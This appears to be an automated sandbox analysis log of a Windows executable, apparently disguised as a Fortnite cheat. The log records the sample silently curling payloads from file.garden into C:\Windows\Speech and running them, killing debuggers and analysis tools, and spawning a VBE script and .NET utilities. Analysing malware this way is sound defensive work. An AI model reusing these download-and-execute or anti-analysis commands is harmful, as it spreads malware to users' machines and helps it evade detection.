                                Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "FortniteClient-Win64-Shipping.exe")
                                Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
                                Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "HTTPDebuggerUI.exe")
                                Source: C:\Windows\System32\cmd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "EpicGamesLauncher.exe")
                                Source: C:\Windows\System32\cmd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "EpicGamesLauncher.exe")
                                Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "HTTPDebuggerSvc.exe")
                                Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "EpicGamesLauncher.exe")
                                Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "EpicGamesLauncher.exe")
                                Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "FortniteClient-Win64-Shipping.exe")
                                Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "FortniteClient-Win64-Shipping.exe")
                                Source: C:\Windows\System32\cmd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
                                Source: C:\Windows\System32\cmd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "EpicGamesLauncher.exe")
                                Source: C:\Windows\System32\cmd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "FortniteClient-Win64-Shipping.exe")
                                Source: C:\Windows\System32\cmd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "HTTPDebugger.exe")
                                Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "FortniteClient-Win64-Shipping.exe")
                                Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
                                Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "EpicGamesLauncher.exe")
                                Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
                                Source: C:\Windows\System32\sc.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "HTTPDebuggerUI.exe")
                                Source: C:\Windows\System32\cmd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
                                Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
                                Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "EpicGamesLauncher.exe")
                                Source: C:\Windows\System32\cmd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "FortniteClient-Win64-Shipping.exe")
                                Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "EpicGamesLauncher.exe")
                                Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "EpicGamesLauncher.exe")
                                Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "EpicGamesLauncher.exe")
                                Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "EpicGamesLauncher.exe")
                                Source: C:\Windows\System32\cmd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "FortniteClient-Win64-Shipping.exe")
                                Source: C:\Windows\System32\cmd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
                                Source: C:\Windows\System32\cmd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "FortniteClient-Win64-Shipping.exe")
                                Source: C:\Windows\System32\cmd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
                                Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
                                Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
                                Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "EpicGamesLauncher.exe")
                                Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "FortniteClient-Win64-Shipping.exe")
                                Source: C:\Windows\System32\cmd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "FortniteClient-Win64-Shipping.exe")
                                Source: C:\Windows\System32\cmd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "EpicGamesLauncher.exe")
                                Source: C:\Windows\System32\cmd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
                                Source: C:\Windows\System32\cmd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "EpicGamesLauncher.exe")
                                Source: C:\Windows\System32\cmd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
                                Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
                                Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "Dbg32.exe")
                                Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "EpicGamesLauncher.exe")
                                Source: C:\Windows\System32\schtasks.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "EpicGamesLauncher.exe")
                                Source: C:\Windows\System32\schtasks.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "FortniteClient-Win64-Shipping.exe")
                                Source: C:\Windows\System32\schtasks.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
                                Source: C:\Windows\System32\schtasks.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
                                Source: C:\Windows\System32\Conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
                                Source: C:\Windows\System32\Conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "Dbg32.exe")
                                Source: C:\Windows\System32\Conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                                Source: UY9hUZn4CQ.exeReversingLabs: Detection: 34%
                                Source: unknownProcess created: C:\Users\user\Desktop\UY9hUZn4CQ.exe "C:\Users\user\Desktop\UY9hUZn4CQ.exe"
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c cls
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c color 7
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c cls
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerUI.exe >nul 2>&1
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im HTTPDebuggerUI.exe
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerSvc.exe >nul 2>&1
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c cls
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c curl --silent https://file.garden/ZmE_ziOgiFXI9Y48/1/imxyvi.bin --output C:\Windows\Speech\imxyvi.exe
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im HTTPDebuggerSvc.exe
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im EpicGamesLauncher.exe
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\curl.exe curl --silent https://file.garden/ZmE_ziOgiFXI9Y48/1/imxyvi.bin --output C:\Windows\Speech\imxyvi.exe
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping.exe >nul 2>&1
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im FortniteClient-Win64-Shipping.exe
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im Ida64.exe >nul 2>&1
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im Ida64.exe
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im OllyDbg.exe >nul 2>&1
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im OllyDbg.exe
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\Speech\imxyvi.exe "C:\Windows\Speech\imxyvi.exe"
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c curl --silent https://file.garden/ZmE_ziOgiFXI9Y48/physmeme.bin --output C:\Windows\Speech\physmeme.exe
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\curl.exe curl --silent https://file.garden/ZmE_ziOgiFXI9Y48/physmeme.bin --output C:\Windows\Speech\physmeme.exe
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im EpicGamesLauncher.exe
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im Dbg64.exe >nul 2>&1
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im Dbg64.exe
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im Dbg32.exe >nul 2>&1
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\Speech\physmeme.exe "C:\Windows\Speech\physmeme.exe"
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c curl --silent https://file.garden/ZmE_ziOgiFXI9Y48/kdmapper.bin --output C:\Windows\Speech\kdmapper.exe
                                Source: C:\Windows\Speech\physmeme.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping.exe >nul 2>&1
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im FortniteClient-Win64-Shipping.exe
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\curl.exe curl --silent https://file.garden/ZmE_ziOgiFXI9Y48/kdmapper.bin --output C:\Windows\Speech\kdmapper.exe
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im Dbg32.exe
                                Source: C:\Windows\System32\taskkill.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -pss -s 460 -p 2084 -ip 2084
                                Source: C:\Windows\Speech\imxyvi.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 2084 -s 380
                                Source: C:\Windows\Speech\physmeme.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c sc stop HTTPDebuggerPro >nul 2>&1
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im EpicGamesLauncher.exe
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop HTTPDebuggerPro
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\Speech\kdmapper.exe "C:\Windows\Speech\kdmapper.exe"
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c curl --silent https://file.garden/ZmE_ziOgiFXI9Y48/build.bin --output C:\Windows\Speech\rtcore64.exe
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\curl.exe curl --silent https://file.garden/ZmE_ziOgiFXI9Y48/build.bin --output C:\Windows\Speech\rtcore64.exe
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping.exe >nul 2>&1
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im FortniteClient-Win64-Shipping.exe
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T >nul 2>&1
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T
                                Source: C:\Windows\Speech\kdmapper.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Edge\L6lFlVnd0szYUYb26bZc.vbe"
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im EpicGamesLauncher.exe
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T >nul 2>&1
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\Speech\rtcore64.exe "C:\Windows\Speech\rtcore64.exe"
                                Source: C:\Windows\Speech\rtcore64.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping.exe >nul 2>&1
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im FortniteClient-Win64-Shipping.exe
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T >nul 2>&1
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im EpicGamesLauncher.exe
                                Source: C:\Windows\Speech\rtcore64.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe"
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerUI.exe >nul 2>&1
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping.exe >nul 2>&1
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im HTTPDebuggerUI.exe
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im FortniteClient-Win64-Shipping.exe
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerSvc.exe >nul 2>&1
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im EpicGamesLauncher.exe
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im HTTPDebuggerSvc.exe
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping.exe >nul 2>&1
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c sc stop HTTPDebuggerPro >nul 2>&1
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop HTTPDebuggerPro
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im FortniteClient-Win64-Shipping.exe
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T >nul 2>&1
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im EpicGamesLauncher.exe
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T >nul 2>&1
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping.exe >nul 2>&1
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im FortniteClient-Win64-Shipping.exe
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T >nul 2>&1
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im EpicGamesLauncher.exe
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq x64dbg*" /IM * /F /T >nul 2>&1
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /FI "IMAGENAME eq x64dbg*" /IM * /F /T
